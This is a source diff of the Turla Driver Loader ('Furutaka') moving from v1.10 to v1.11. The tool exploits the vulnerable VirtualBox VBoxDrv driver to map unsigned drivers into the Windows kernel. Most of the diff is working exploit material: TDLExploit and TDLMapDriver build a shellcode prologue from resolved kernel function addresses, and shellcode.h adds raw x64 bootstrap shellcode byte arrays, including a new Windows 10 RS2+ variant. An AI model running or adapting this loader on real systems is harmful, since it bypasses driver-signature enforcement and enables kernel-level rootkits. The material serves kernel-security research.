<EnablePREfast>false</EnablePREfast>
<ControlFlowGuard>Guard</ControlFlowGuard>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
<FavorSizeOrSpeed>Neither</FavorSizeOrSpeed>
<SDLCheck>true</SDLCheck>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EntryPointSymbol>TDLMain</EntryPointSymbol>
<SetChecksum>true</SetChecksum>
<UACExecutionLevel>RequireAdministrator</UACExecutionLevel>

4
Source/Furutaka/global.h
View File

@ -4,9 +4,9 @@
*
* TITLE: GLOBAL.H
*
* VERSION: 1.10
* VERSION: 1.11
*
* DATE: 17 Apr 2017
* DATE: 20 Apr 2017
*
* Common header file for the program support routines.
*

105
Source/Furutaka/main.c
View File

@ -4,9 +4,9 @@
*
* TITLE: MAIN.C
*
* VERSION: 1.10
* VERSION: 1.11
*
* DATE: 17 Apr 2017
* DATE: 20 Apr 2017
*
* Furutaka entry point.
*
@ -34,17 +34,18 @@ BOOL g_ConsoleOutput = FALSE;
BOOL g_VBoxInstalled = FALSE;
WCHAR g_BE = 0xFEFF;
ULONG g_NtBuildNumber = 0;
#define VBoxDrvSvc TEXT("VBoxDrv")
#define supImageName "furutaka"
#define supImageHandle 0x1a000
#define PAGE_SIZE 0x1000
#define scDataOffset 0x214 //shellcode data offset
#define T_LOADERTITLE TEXT("Turla Driver Loader v1.1 (17/04/17)")
#define T_LOADERTITLE TEXT("Turla Driver Loader v1.1.1 (20/04/17)")
#define T_LOADERUNSUP TEXT("Unsupported WinNT version\r\n")
#define T_LOADERRUN TEXT("Another instance running, close it before\r\n")
#define T_LOADERUSAGE TEXT("Usage: loader drivertoload\n\re.g. loader mydrv.sys\r\n")
#define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.0 started\r\n(c) 2016 - 2017 TDL Project\r\nSupported x64 OS : 7 and above\r\n")
#define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.1 started\r\n(c) 2016 - 2017 TDL Project\r\nSupported x64 OS : 7 and above\r\n")
/*
* TDLVBoxInstalled
@ -83,8 +84,8 @@ BOOL TDLVBoxInstalled(
*
*/
void TDLRelocImage(
ULONG_PTR Image,
ULONG_PTR NewImageBase
_In_ ULONG_PTR Image,
_In_ ULONG_PTR NewImageBase
)
{
PIMAGE_OPTIONAL_HEADER popth;
@ -139,9 +140,9 @@ void TDLRelocImage(
*
*/
ULONG_PTR TDLGetProcAddress(
ULONG_PTR KernelBase,
ULONG_PTR KernelImage,
LPCSTR FunctionName
_In_ ULONG_PTR KernelBase,
_In_ ULONG_PTR KernelImage,
_In_ LPCSTR FunctionName
)
{
ANSI_STRING cStr;
@ -163,9 +164,9 @@ ULONG_PTR TDLGetProcAddress(
*
*/
void TDLResolveKernelImport(
ULONG_PTR Image,
ULONG_PTR KernelImage,
ULONG_PTR KernelBase
_In_ ULONG_PTR Image,
_In_ ULONG_PTR KernelImage,
_In_ ULONG_PTR KernelBase
)
{
PIMAGE_OPTIONAL_HEADER popth;
@ -211,8 +212,9 @@ void TDLResolveKernelImport(
*
*/
void TDLExploit(
LPVOID Shellcode,
ULONG CodeSize
_In_ LPVOID Shellcode,
_In_ ULONG CodeSize,
_In_ ULONG DataOffset
)
{
SUPCOOKIE Cookie;
@ -307,7 +309,7 @@ void TDLExploit(
ultohex(CodeSize, _strend(text));
_strcat(text, TEXT("\r\n\tDriver image mapped at 0x"));
u64tohex((ULONG_PTR)ImageBase + scDataOffset, _strend(text));
u64tohex((ULONG_PTR)ImageBase + DataOffset, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
@ -376,13 +378,14 @@ void TDLExploit(
*
*/
UINT TDLMapDriver(
LPWSTR lpDriverFullName
_In_ LPWSTR lpDriverFullName
)
{
UINT result = (UINT)-1;
ULONG isz;
ULONG isz, prologueSize, dataOffset;
SIZE_T memIO;
ULONG_PTR KernelBase, KernelImage = 0, xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0;
ULONG_PTR KernelBase, KernelImage = 0;
ULONG_PTR xExAllocatePoolWithTag = 0, xPsCreateSystemThread = 0, xZwClose = 0;
HMODULE Image = NULL;
PIMAGE_NT_HEADERS FileHeader;
PBYTE Buffer = NULL;
@ -443,6 +446,7 @@ UINT TDLMapDriver(
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
if (g_NtBuildNumber < 15063) {
RtlInitString(&routineName, "PsCreateSystemThread");
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread);
if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) {
@ -455,6 +459,19 @@ UINT TDLMapDriver(
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
RtlInitString(&routineName, "ZwClose");
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xZwClose);
if ((!NT_SUCCESS(status)) || (xZwClose == 0)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error, ZwClose address not found"), g_ConsoleOutput, TRUE);
break;
}
else {
_strcpy(text, TEXT("Ldr: ZwClose 0x"));
u64tohex(KernelBase + (xZwClose - KernelImage), _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
}
}
memIO = isz + PAGE_SIZE;
NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&Buffer, 0, &memIO,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
@ -470,25 +487,49 @@ UINT TDLMapDriver(
// mov rcx, ExAllocatePoolWithTag
// mov rdx, PsCreateSystemThread
// mov r8, ZwClose
Buffer[0x00] = 0x48; // mov rcx, xxxxx
Buffer[0x01] = 0xb9;
*((PULONG_PTR)&Buffer[2]) =
KernelBase + (xExAllocatePoolWithTag - KernelImage);
if (g_NtBuildNumber < 15063) {
Buffer[0x0a] = 0x48; // mov rdx, xxxxx
Buffer[0x0b] = 0xba;
*((PULONG_PTR)&Buffer[0x0c]) =
KernelBase + (xPsCreateSystemThread - KernelImage);
Buffer[0x14] = 0x49; //mov r8, xxxxx
Buffer[0x15] = 0xb8;
*((PULONG_PTR)&Buffer[0x16]) =
KernelBase + (xZwClose - KernelImage);
RtlCopyMemory(Buffer + 0x14,
prologueSize = 0x1e;
}
else {
prologueSize = 0x0a;
}
dataOffset = prologueSize + MAX_SHELLCODE_LENGTH;
if (g_NtBuildNumber < 15063) {
RtlCopyMemory(Buffer + prologueSize,
TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code));
RtlCopyMemory(Buffer + scDataOffset, Image, isz);
cuiPrintText(g_ConOut, TEXT("Ldr: Default bootstrap shellcode selected"), g_ConsoleOutput, TRUE);
}
else {
RtlCopyMemory(Buffer + prologueSize,
TDLBootstrapLoader_code_w10rs2, sizeof(TDLBootstrapLoader_code_w10rs2));
cuiPrintText(g_ConOut, TEXT("Ldr: Windows 10 RS2+ bootstrap shellcode selected"), g_ConsoleOutput, TRUE);
}
RtlCopyMemory(Buffer + dataOffset, Image, isz);
cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE);
TDLResolveKernelImport((ULONG_PTR)Buffer + scDataOffset, KernelImage, KernelBase);
TDLResolveKernelImport((ULONG_PTR)Buffer + dataOffset, KernelImage, KernelBase);
cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE);
TDLExploit(Buffer, isz + PAGE_SIZE);
TDLExploit(Buffer, isz + PAGE_SIZE, dataOffset);
result = 0;
break;
}
@ -575,14 +616,15 @@ HANDLE TDLStartVulnerableDriver(
}
}
//if vbox installed backup it driver, do it before dropping our
//
// If vbox installed backup it driver, do it before dropping our
// Ignore error if file not found
//
if (g_VBoxInstalled) {
if (supBackupVBoxDrv(FALSE) == FALSE) {
cuiPrintText(g_ConOut,
TEXT("Ldr: Error while doing VirtualBox driver backup"),
g_ConsoleOutput, TRUE);
break;
}
}
@ -717,7 +759,7 @@ void TDLStopVulnerableDriver(
*
*/
UINT TDLProcessCommandLine(
LPWSTR lpCommandLine
_In_ LPWSTR lpCommandLine
)
{
UINT retVal = (UINT)-1;
@ -765,7 +807,7 @@ void TDLMain()
UINT uResult = 0;
DWORD dwTemp;
LONG x;
OSVERSIONINFOW osv;
OSVERSIONINFO osv;
WCHAR text[256];
__security_init_cookie();
@ -795,7 +837,6 @@ void TDLMain()
T_LOADERINTRO,
g_ConsoleOutput, TRUE);
x = InterlockedIncrement((PLONG)&g_lApplicationInstances);
if (x > 1) {
cuiPrintText(g_ConOut,
@ -817,6 +858,8 @@ void TDLMain()
break;
}
g_NtBuildNumber = osv.dwBuildNumber;
_strcpy(text, TEXT("Ldr: Windows v"));
ultostr(osv.dwMajorVersion, _strend(text));
_strcat(text, TEXT("."));
@ -825,6 +868,10 @@ void TDLMain()
ultostr(osv.dwBuildNumber, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
//
// If VirtualBox installed on the same machine warn user,
// however this is unnecessary can lead to any conflicts.
//
g_VBoxInstalled = TDLVBoxInstalled();
if (g_VBoxInstalled) {
cuiPrintText(g_ConOut,

BIN
Source/Furutaka/resource.rc
View File

Binary file not shown.

180
Source/Furutaka/shellcode.h
View File

@ -4,9 +4,9 @@
*
* TITLE: SHELLCODE.H
*
* VERSION: 1.10
* VERSION: 1.11
*
* DATE: 17 Apr 2017
* DATE: 20 Apr 2017
*
* Loader bootstrap shellcode.
*
@ -22,8 +22,7 @@
typedef PVOID(NTAPI *PfnExAllocatePoolWithTag)(
_In_ POOL_TYPE PoolType,
_In_ SIZE_T NumberOfBytes,
_In_ ULONG Tag
);
_In_ ULONG Tag);
typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)(
_Out_ PHANDLE ThreadHandle,
@ -32,8 +31,14 @@ typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)(
_In_opt_ HANDLE ProcessHandle,
_Out_opt_ PCLIENT_ID ClientId,
_In_ PKSTART_ROUTINE StartRoutine,
_In_opt_ PVOID StartContext
);
_In_opt_ PVOID StartContext);
typedef NTSTATUS (NTAPI *PfnZwClose)(
_In_ HANDLE Handle);
typedef NTSTATUS(NTAPI *PfnDriverEntry)();
#define MAX_SHELLCODE_LENGTH 0x300
/*
* TDLBootstrapLoader
@ -46,10 +51,11 @@ typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)(
/*
void TDLBootstrapLoader(
PfnExAllocatePoolWithTag ExAllocatePoolWithTag,
PfnPsCreateSystemThread PsCreateSystemThread)
PfnPsCreateSystemThread PsCreateSystemThread,
PfnZwClose ZwClose)
{
ULONG_PTR pos, exbuffer,
Image = ((ULONG_PTR)&TDLBootstrapLoader) + 0x200;
Image = ((ULONG_PTR)&TDLBootstrapLoader) + MAX_SHELLCODE_LENGTH;
PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image;
PIMAGE_FILE_HEADER fileh =
@ -110,36 +116,148 @@ void TDLBootstrapLoader(
for (pos = 0; pos < isz; pos++)
((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos];
th = NULL;
InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL,
(PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL);
if (NT_SUCCESS(PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL,
(PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL)))
{
ZwClose(th);
}
}
*/
static const unsigned char TDLBootstrapLoader_code[415] = {
0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2,
0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF,
0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C,
0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00,
0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00,
0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F,
0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84,
0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B,
0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89,
0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00,
const unsigned char TDLBootstrapLoader_code[480] = {
0x48, 0x8B, 0xC4, 0x41, 0x54, 0x48, 0x81, 0xEC, 0x90, 0x00, 0x00, 0x00, 0x48, 0x89, 0x58, 0x10,
0x4D, 0x8B, 0xE0, 0x48, 0x89, 0x68, 0x18, 0x48, 0x8D, 0x1D, 0xE2, 0xFF, 0xFF, 0xFF, 0x4C, 0x89,
0x68, 0xE8, 0x48, 0x81, 0xC3, 0x00, 0x03, 0x00, 0x00, 0x4C, 0x89, 0x70, 0xE0, 0x4C, 0x8B, 0xEA,
0x4C, 0x89, 0x78, 0xD8, 0x4C, 0x8B, 0xC9, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, 0x53, 0x4C,
0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, 0x10, 0x00,
0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xC9, 0x48, 0x8D, 0xA8, 0x00, 0x10, 0x00, 0x00, 0x48, 0x81,
0xE5, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, 0x86, 0xB0,
0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, 0xA1, 0x00,
0x00, 0x00, 0x48, 0x89, 0xB4, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, 0x41, 0x8B,
0xB6, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDD, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, 0xBC, 0x24,
0x88, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xF9, 0x85, 0xF6, 0x74, 0x68, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43,
0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9,
0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C,
0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C,
0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48,
0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0,
0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00,
0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48,
0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFE, 0x72, 0xA0,
0x45, 0x33, 0xC9, 0x48, 0x8B, 0xB4, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0x88,
0x00, 0x00, 0x00, 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0x7C, 0x24, 0x70, 0x48, 0xC1, 0xEA, 0x03, 0x48,
0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCD, 0x48, 0x2B, 0xDD, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75,
0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44,
0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58,
0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24,
0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6,
0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41,
0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3
0xEF, 0x4C, 0x89, 0x4C, 0x24, 0x30, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0x4C, 0x89, 0x8C, 0x24, 0xA0,
0x00, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x4C, 0x24, 0x48,
0x0F, 0x57, 0xC0, 0x4C, 0x89, 0x4C, 0x24, 0x50, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0xF3, 0x0F, 0x7F,
0x44, 0x24, 0x60, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x58, 0x00,
0x02, 0x00, 0x00, 0x41, 0x8B, 0x46, 0x28, 0x48, 0x03, 0xC5, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C,
0x89, 0x4C, 0x24, 0x20, 0x45, 0x33, 0xC9, 0x41, 0xFF, 0xD5, 0x4C, 0x8B, 0x74, 0x24, 0x78, 0x4C,
0x8B, 0xAC, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xAC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x48,
0x8B, 0x9C, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x85, 0xC0, 0x78, 0x0B, 0x48, 0x8B, 0x8C, 0x24, 0xA0,
0x00, 0x00, 0x00, 0x41, 0xFF, 0xD4, 0x48, 0x81, 0xC4, 0x90, 0x00, 0x00, 0x00, 0x41, 0x5C, 0xC3
};
/*
* TDLBootstrapLoader_w10rs2
*
* Purpose:
*
* Main part of shellcode used to execute driver code since w10rs2.
*
*/
/*
void TDLBootstrapLoader_w10rs2(
PfnExAllocatePoolWithTag ExAllocatePoolWithTag
)
{
ULONG_PTR pos, exbuffer,
Image = ((ULONG_PTR)&TDLBootstrapLoader_w10rs2) + MAX_SHELLCODE_LENGTH;
PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image;
PIMAGE_FILE_HEADER fileh =
(PIMAGE_FILE_HEADER)(Image + sizeof(DWORD) + dosh->e_lfanew);
PIMAGE_OPTIONAL_HEADER popth =
(PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));
PfnDriverEntry DriverEntry;
ULONG isz = popth->SizeOfImage;
PIMAGE_BASE_RELOCATION rel;
DWORD_PTR delta;
LPWORD chains;
DWORD c, p, rsz;
exbuffer = (ULONG_PTR)ExAllocatePoolWithTag(
NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE;
exbuffer &= ~(PAGE_SIZE - 1);
if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC)
if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0)
{
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image +
popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
delta = (DWORD_PTR)exbuffer - popth->ImageBase;
c = 0;
while (c < rsz) {
p = sizeof(IMAGE_BASE_RELOCATION);
chains = (LPWORD)((PBYTE)rel + p);
while (p < rel->SizeOfBlock) {
switch (*chains >> 12) {
case IMAGE_REL_BASED_HIGHLOW:
*(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta;
break;
case IMAGE_REL_BASED_DIR64:
*(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta;
break;
}
chains++;
p += sizeof(WORD);
}
c += rel->SizeOfBlock;
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock);
}
}
isz >>= 3;
for (pos = 0; pos < isz; pos++)
((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos];
DriverEntry = (PfnDriverEntry)(exbuffer + popth->AddressOfEntryPoint);
DriverEntry();
}
*/
static const unsigned char TDLBootstrapLoader_code_w10rs2[321] = {
0x40, 0x53, 0x55, 0x56, 0x48, 0x83, 0xEC, 0x20, 0x4C, 0x8B, 0xC9, 0x4C, 0x89, 0x7C, 0x24, 0x50,
0x48, 0x8D, 0x1D, 0xE9, 0xFF, 0xFF, 0xFF, 0x33, 0xC9, 0x48, 0x81, 0xC3, 0x00, 0x03, 0x00, 0x00,
0x41, 0xB8, 0x54, 0x64, 0x6C, 0x53, 0x48, 0x63, 0x6B, 0x3C, 0x48, 0x03, 0xEB, 0x44, 0x8B, 0x7D,
0x50, 0x41, 0x8D, 0x97, 0x00, 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x48, 0x8D, 0xB0, 0x00, 0x10,
0x00, 0x00, 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x83, 0xBD, 0x84, 0x00, 0x00, 0x00, 0x05,
0x0F, 0x86, 0xA5, 0x00, 0x00, 0x00, 0x8B, 0x8D, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84,
0x97, 0x00, 0x00, 0x00, 0x48, 0x89, 0x7C, 0x24, 0x40, 0x4C, 0x8D, 0x04, 0x0B, 0x4C, 0x8B, 0xDE,
0x4C, 0x89, 0x74, 0x24, 0x48, 0x4C, 0x2B, 0x5D, 0x30, 0x33, 0xFF, 0x44, 0x8B, 0xB5, 0xB4, 0x00,
0x00, 0x00, 0x45, 0x85, 0xF6, 0x74, 0x6A, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00,
0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43,
0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9,
0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C,
0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C,
0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48,
0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x41, 0x3B, 0xFE, 0x72,
0x9F, 0x48, 0x8B, 0x7C, 0x24, 0x40, 0x4C, 0x8B, 0x74, 0x24, 0x48, 0x49, 0x8B, 0xD7, 0x4C, 0x8B,
0x7C, 0x24, 0x50, 0x48, 0xC1, 0xEA, 0x03, 0x48, 0x85, 0xD2, 0x74, 0x25, 0x48, 0x8B, 0xCE, 0x48,
0x2B, 0xDE, 0x0F, 0x1F, 0x40, 0x00, 0x66, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75,
0xEF, 0x8B, 0x45, 0x28, 0x48, 0x03, 0xC6, 0x48, 0x83, 0xC4, 0x20, 0x5E, 0x5D, 0x5B, 0x48, 0xFF,
0xE0
};

30
TDL.sha256
View File

@ -1,32 +1,32 @@
c371453e2eb9edab0949472d14871f09a6c60e4bab647910da83943bb4d3104c *Compiled\dummy.sys
4c8d13b1693c77bc4b75ae0f6262260cbc1478f3da33d039930d265db5d7eb3e *Compiled\dummy2.sys
9c81608bea1766f195ddf49f9a07b23da96dbf17a5e2d66405492eaa3155996e *Compiled\Furutaka.exe
c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv\dummy.sln
01662c807519eac05d7082c151be3824418ccf1716216895680fe5598093d245 *Source\DummyDrv\dummy\dummy.vcxproj
a761bbb4a1b7813132dc8d8ed526d24289dc603bc706da238e1f23d75dbd66aa *Compiled\dummy.sys
f6610691bc3b9f96dad8bfc00b3ceb939ebcb17844d1ca5ee26f8364944ca110 *Compiled\dummy2.sys
bef3056b55e2f29525817e3e44753dcf32152460028d27b28e54cce3a7d1eb0f *Compiled\Furutaka.exe
14eec2753d0e9b432c54c4a70fc59e3be75674313b6308a7a820e6682f775eb9 *Source\DummyDrv\dummy.sln
d61ebda2674d2db05a235478f89fed02c2de049b00ac5648fcebd4c4e638f71c *Source\DummyDrv\dummy\dummy.vcxproj
2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters
d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv\dummy\dummy.vcxproj.user
da9e4121c5a6970b0e10e6cca6fa6065e758f5b54b46c33ff99e7f98d98d00bc *Source\DummyDrv\dummy\main.c
c366e840cdcb157bd40f722935ad8646046bc6cd013817d400617bd8d90de0e0 *Source\DummyDrv2\dummy.sln
2fd78ce2843d7c77b1249bb7288d87605a4b3979b150a982eae56ecbabdcfb32 *Source\DummyDrv2\dummy\dummy.vcxproj
4c86a0477e8f21e81bc6651bc06cea26241fc5b9a033e64c3cd843267fc98575 *Source\DummyDrv\dummy\main.c
14eec2753d0e9b432c54c4a70fc59e3be75674313b6308a7a820e6682f775eb9 *Source\DummyDrv2\dummy.sln
f9a718ca087a1dce71638855837c464b190b7310f8e6715fc4471ed2b85af27d *Source\DummyDrv2\dummy\dummy.vcxproj
f53e8133a9d12b751445ed57f4574bbeba722d26096196f544ed1794adf699f4 *Source\DummyDrv2\dummy\dummy.vcxproj.filters
d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDrv2\dummy\dummy.vcxproj.user
a23f846a6321b8e411dce50c61c5d2675ee7dc6fef0e3b69d8a671120cd27b76 *Source\DummyDrv2\dummy\main.c
cc5dab13546ffcb16e97b664783e6a9121c99f89ece7dd63300714246e9622fa *Source\DummyDrv2\dummy\main.h
1e73ce5b6b079e6986509c218ce0880536b37c505056f831989e73b835c1cbbc *Source\DummyDrv2\dummy\main.c
f0732da25aa6b0a64eb0ebfc730c0902ed6fd1cc51f43f66813adbc5283de6ec *Source\DummyDrv2\dummy\main.h
10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c
